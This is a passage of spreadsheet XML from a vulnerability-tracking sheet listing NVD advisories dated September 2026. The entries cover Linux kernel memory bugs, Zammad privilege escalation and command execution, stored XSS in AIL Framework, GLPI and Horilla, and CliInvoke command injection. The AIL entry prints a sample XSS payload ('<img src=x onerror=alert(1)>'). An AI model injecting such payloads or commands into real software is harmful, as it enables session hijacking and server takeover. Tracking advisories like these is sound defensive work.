      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Unlink NVMe unsol ctx before freeing on LS reject error
qla_nvme_xmt_ls_rsp() obtains uctx, which was linked into
fcport-&gt;unsol_ctx_head by qla2xxx_process_purls_iocb() and is still linked
when the NVMe transport calls back to transmit the LS response. On the
error (out:) path the function frees uctx with kfree() but never removes
it from the list. This leaves a freed node in fcport-&gt;unsol_ctx_head: the
next list_add_tail() for that fcport writes through the freed node, and a
subsequent list_del() can corrupt the list or panic.
Unlink uctx with list_del() before kfree() on the error path, matching the
other free sites in qla_nvme_release_lsrsp_cmd_kref() and
qla2xxx_process_purls_pkt(). qla2x00_rel_sp() in the failure path only
returns the SRB to its pool and does not invoke sp-&gt;put_fn, so the out:
path is the sole free and uctx is always still linked there.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97528</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97555</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix heap overflow in DACL owner/group rewrite
When id_mode_to_cifs_acl rewrites an existing DACL, it allocates a
buffer sized according to the on-disk DACL length reported by
dacl_ptr-&gt;size. However, replace_sids_and_copy_aces may rewrite each
ACE with a new owner/group SID obtained from the cifs.idmap upcall.
Those SIDs can have up to SID_MAX_SUB_AUTHORITIES (15) sub-authorities,
making each ACE up to 76 bytes (sizeof(struct smb_ace)).
If the original DACL contains short SIDs (e.g., 1 sub-authority) while
the replacement SIDs are long, the rewritten ACEs overflow the
allocation.
Fix this by always budgeting for worst-case SID expansion: allocate
sizeof(struct smb_acl) plus num_aces * sizeof(struct smb_ace), which
covers the smb_acl header and room for every ACE at maximum SID size.
This replaces the previous split logic that used dacl_ptr-&gt;size for
cifsacl mounts but num_aces * sizeof(struct smb_ace) for mode_from_sid
mounts: both paths can trigger the same rewrite and need the same
headroom.
KASAN reports this as:
  BUG: KASAN: slab-out-of-bounds in build_sec_desc+0x1e8a/0x2680 [cifs]
  Write of size 4 at addr ffff8881a5e25374 by task chown/5298
  ...
  The buggy address is located 0 bytes to the right of
   allocated 884-byte region [ffff8881a5e25000, ffff8881a5e25374)</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97555</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97957</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: hinic: fix mailbox segment buffer overflow
check_mbox_seq_id_and_seg_len() validates that seq_id does not
exceed SEQ_ID_MAX_VAL (42) and seg_len does not exceed
MBOX_SEG_LEN (48).  However, this allows the last segment
(seq_id=42) to carry a full 48-byte payload, writing to offset
42*48=2016 for 48 bytes (ending at byte 2064).  The receive
buffer is only MBOX_MAX_BUF_SZ (2048) bytes, resulting in a
16-byte heap buffer overflow.
The hinic3 driver already handles this correctly by defining
MBOX_LAST_SEG_MAX_LEN and rejecting the last segment when it
exceeds the remaining buffer space.  Apply the same fix to the
hinic driver.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97957</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98115</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>requests, go</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: safely drain sessions during logoff
SMB3 multichannel allows requests for one session to run on multiple
connections. Wait for all channels bound to a session before freeing
shared session objects.
A deferred byte-range lock remains counted as a running request and only
wakes when its file closes. Wake blocked locks during the drain without
unpublishing or modifying their file objects. Synchronous CANCEL requests
must invoke their cancellation callback to wake pending operations, while
CHANGE_NOTIFY completion remains specific to the asynchronous path.
Serialize session teardown with channel registration and previous-session
cleanup, and use atomic work-state transitions so LOGOFF, CANCEL, and
connection teardown invoke cancellation callbacks only once.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98115</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56725</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An unauthenticated request to POST /api/v1/import/otrs/import_check blocks a Zammad request worker for roughly two minutes. The import_check and import_status actions are missing the setup_done_response guard that other actions in the same controller carry, so they execute on fully set-up production instances. The action enters a retry loop against a blank OTRS endpoint, sleeping for 30 s + 45 s between attempts. Impact An unauthenticated remote attacker denies service to a production Zammad instance. Each request costs almost nothing and forces ~115 seconds of server-side blocking. A few requests per second saturate the Puma worker pool. The condition persists as long as the traffic continues. No account, valid import configuration, or target knowledge beyond the hostname is needed. CSRF token is trivially obtained from any prior GET response. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56725</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56733</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, this issue concerns a lack of discursive validation within the authorization cascade. It has been determined that the system-level enforcement of access restrictions during the initialization of new identity objects exhibits a discrepancy: Under specific conditions, the granular restrictions of the access key being used are overridden by the latent authorization authority of the parent account. Consequently, this means that the intended separation of functional areas is nullified, resulting in an uncontrolled expansion of administrative discretion. Due to this potential integrity breach of the entire trust environment, an immediate evaluation of the authorization hierarchies is imperative. Impact An attacker can create new administrator accounts despite token restrictions. This grants full access to all system data (tickets, customers, configuration) and allows the attacker to take complete control of the Zammad instance. Abuse Scenario The vulnerability stems from a lack of synergy between the token-based authorization logic and the target system's functional authorization hierarchy, which allows for iterative escalation of the privileged access context. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56733</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84462</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, a security filter that protects Zammad's AI Agent configuration can be bypassed by entering specially crafted text into one of an AI Agent's fields. An administrator with permission to create or edit AI Agents could exploit this to run arbitrary commands on the server that hosts Zammad, potentially reading, modifying, or destroying all data stored on that server. No interaction from other users is needed; the malicious code runs automatically the next time the affected AI Agent processes a ticket. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84462</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100172</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework (ail-project/ail-framework) contains a stored cross-site scripting (XSS) vulnerability in two Jinja2 templates that render popovers for matched, tracked, or tagged content: var/www/templates/chats_explorer/block_message.html and var/www/templates/objects/item/show_item.html. In both templates, dynamic values associated with this content, including icon color, icon style, icon glyph, subtype, identifier, name, description, and matched value, are interpolated directly into the data-content HTML attribute of Bootstrap popover elements without appropriate output encoding. Because the popovers are configured with data-html="true", the content is interpreted as HTML in the victim's browser. An authenticated attacker who can influence matched, tracked, or tagged content may inject arbitrary HTML or JavaScript into these values. When a victim displays the affected popover, the injected markup may execute in the victim's session, potentially enabling data exfiltration or actions with the victim's privileges. The vulnerability is classified as stored XSS because the malicious payload can persist in the affected match, tracking, or tag-related data and be delivered to users who view the affected content.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100172</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100176</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework's username timeline feature is vulnerable to stored cross-site scripting (XSS). Usernames imported from chats and crawled forums are stored without character restrictions. When an authenticated analyst views the username timeline, the application renders these stored usernames into the DOM using D3's html() method in the tooltip. Because the username value (d.obj) is interpolated directly into an HTML string without sanitization, a crafted username containing HTML event handlers (e.g., &lt;img src=x onerror=alert(1)&gt;) will execute arbitrary JavaScript in the analyst's browser when the analyst hovers over the corresponding timeline entry. The attack requires the victim to be an authenticated analyst with access to the timeline view and to interact with the malicious timeline entry (hover). Successful exploitation can lead to session hijacking, data exfiltration, or unauthorized actions performed within the analyst's authenticated session. The vulnerability resides in the client-side JavaScript file var/www/static/js/d3/timeline_basic.js.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100176</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47679</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 10.0.0 until 10.0.26 and 11.0.8, any logged-in GLPI user can exploit insufficient path validation in the profile-picture update flow to request deletion of an attacker-selected file hosted by the server. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47679</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55214</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.6 until 11.0.8, an authenticated technician can store active markup in supplier website fields. Any user who opens the affected item's suppliers list triggers the stored cross-site scripting payload. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55214</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71483</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 1.6.0, the search parameter at /employee/employee-filter-view is reflected by jQuery .html() in employee/templates/employee_nav.html without HTML neutralization. An external attacker can craft and deliver a link that causes JavaScript to execute when an authenticated employee or administrator reaches the employee filter, allowing access to browser-visible session data and actions with the victim's application privileges. This issue is fixed in version 1.6.0.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71483</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100248</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>The Rattadan Cosmowarp smart contract before 56c6147 can have a comparison to an unintended value of current_admin.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100248</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100368</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke.Specializations, nuget:CliInvoke.Specializations</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.1</t>
        </is>
      </c>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>CliInvoke is a .NET library for invoking command-line programs, and its `CliInvoke.Specializations` packages provide specialized wrappers for shells such as PowerShell and Windows Command Prompt. `CliInvoke.Specializations` versions 2.2.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, 3.0.0-alpha.1 through 3.0.0-alpha.4, and 3.0.0-alpha.8 through 3.0.0-alpha.10, as well as `AlastairLundy.CliInvoke.Specializations` versions 1.0.0-rc.1 through 1.6.1.1, contain an OS command injection vulnerability in their PowerShell and Cmd wrappers. The wrappers pass a caller-controlled target and arguments to `pwsh -Command` or `cmd /c` using a single `ProcessStartInfo.Arguments` string, allowing a double quote in untrusted input to break operating-system-level quoting and cause the shell to execute an additional command with the host process's privileges. The vulnerability is patched in `CliInvoke.Specializations` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.1, and in `AlastairLundy.CliInvoke.Specializations` version 